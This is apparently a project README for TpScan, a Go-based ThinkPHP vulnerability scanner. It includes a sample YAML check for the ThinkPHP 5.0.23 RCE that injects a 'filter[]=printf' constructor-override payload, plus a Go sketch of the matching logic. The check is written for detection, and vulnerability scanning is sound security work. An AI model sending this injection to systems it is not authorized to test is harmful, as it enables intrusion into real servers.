captain686/TpScan

TpScan

☃️What

A ThinkPHP scanner written in Go. PoCs are loaded from YAML files.

🤪How

  • Test a single URL
    ./TpScan.exe -u http://node4.buuoj.cn:26433/
  • Test a batch of URLs
    ./TpScan.exe -f test.txt

🤑About

  • YAML file format

    name: 5.0.23-Rce
    rules:
      r1:
        request:
          method: POST
          headers:
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
          path: /index.php?s=captcha
          body: _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=randomStr
        expression:
    #      result: and
    #      response_status: 404
          inResponse: |
            randomStr
    
      r2:
        request:
    # POST and GET are supported
          method: POST
          headers:
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
          path: _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=randomStr
          FollowRedirects: true
    # Allow following 302 redirects; defaults to true
        expression:
    # r2 is verified as response_status == 404 && inResponse(randomStr)
    #      result: and
    #      result: or
    #      response_status: 404
          inResponse: |
            randomStr
    # randomStr is a placeholder that is automatically replaced with 10 random characters
    
    expression:
      r1 || r2
    #  r1 && r2
    # Logical operators are supported
    
    
    # Information section
    detail:
      author: Captain686
      links:
        - https://github.com/captain686

    The format is based on the Xray PoC format, with some modifications.

    PoC files are stored in the User_Exploit directory.
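
How the matching semantics in the sample above can be read, as an added Go example that is not TpScan's own code: it checks one rule's `expression` block against an already-received response, then combines the rule results with `||` and `&&`. The `Expr` type, the function names, the default of `and`, and `&&` binding tighter than `||` are assumptions; the token and response body are constructed.

```go
package main

import (
	"fmt"
	"strings"
)

// Expr mirrors one rule's `expression` block; a zero or empty field means
// that check is commented out, as in the sample file.
type Expr struct {
	Result         string // "and" (assumed default) or "or"
	ResponseStatus int
	InResponse     string // may contain the randomStr placeholder
}

// MatchRule applies one rule's checks to an already-received status and body.
func MatchRule(e Expr, token string, status int, body string) bool {
	want := strings.TrimSpace(strings.ReplaceAll(e.InResponse, "randomStr", token))
	inBody := strings.Contains(body, want) // an empty want always matches
	statusOK := e.ResponseStatus == 0 || status == e.ResponseStatus
	if e.Result == "or" && e.ResponseStatus != 0 && want != "" {
		return statusOK || inBody
	}
	return statusOK && inBody
}

// EvalExpr evaluates "r1 || r2"-style expressions over per-rule results.
// Assumptions: no parentheses, && binds tighter than ||, unknown names are false.
func EvalExpr(expr string, results map[string]bool) bool {
	hit := false
	for _, term := range strings.Split(expr, "||") {
		all := true
		for _, name := range strings.Split(term, "&&") {
			all = all && results[strings.TrimSpace(name)]
		}
		hit = hit || all
	}
	return hit
}

func main() {
	tok := "k3v9x0q2mz"              // constructed 10-character stand-in for randomStr
	body := "<pre>" + tok + "</pre>" // constructed response body, status 200
	res := map[string]bool{
		"r1": MatchRule(Expr{InResponse: "randomStr\n"}, tok, 200, body),
		"r2": MatchRule(Expr{Result: "and", ResponseStatus: 404, InResponse: "randomStr\n"}, tok, 200, body),
	}
	fmt.Println(res, EvalExpr("r1 || r2", res), EvalExpr("r1 && r2", res))
}
```

A rule that checks only `inResponse` reports a match for any response containing the token, including a page that simply reflects the request, so enabling `response_status` with `result: and` makes the check stricter.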

😎ToDo

  • Add more PoC files in later updates